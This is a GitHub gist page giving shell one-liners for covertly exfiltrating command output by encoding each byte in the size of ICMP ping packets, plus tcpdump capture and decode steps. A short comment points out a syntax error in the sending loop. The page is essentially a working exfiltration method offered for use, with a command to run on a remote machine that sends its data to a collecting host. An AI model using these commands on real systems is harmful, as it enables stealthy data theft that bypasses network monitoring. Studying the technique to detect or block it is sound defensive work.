Skip to content

Instantly share code, notes, and snippets.

@jobertabma
Last active September 14, 2022 15:02
Show Gist options
  • Save jobertabma/e9a383a8ad96baa189b65cdc8d74a845 to your computer and use it in GitHub Desktop.
Save jobertabma/e9a383a8ad96baa189b65cdc8d74a845 to your computer and use it in GitHub Desktop.
Commands to exfiltrate command output via ICMP packet size
  1. Capture ICMP packets on your server:
tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap
  1. Send ICMP packets to your server with each byte stored in the packet size, execute this on the remote machine:
ip=vm03;output=`hostname`;for ((i=0;i<${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done
  1. Stop tcpdump started in step 1
  2. Decode the ICMP packet sizes to reveal the command output:
tcpdump -ttttnnr output.cap | awk '{print $NF}' | while read ord; do printf "\\$(printf '%03o' "`expr $ord - 8`")"; done; echo
@cedriczirtacic
Copy link

cedriczirtacic commented Jul 6, 2017

do; will fail in bash. Is better if you remove that ; on the 2nd step.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment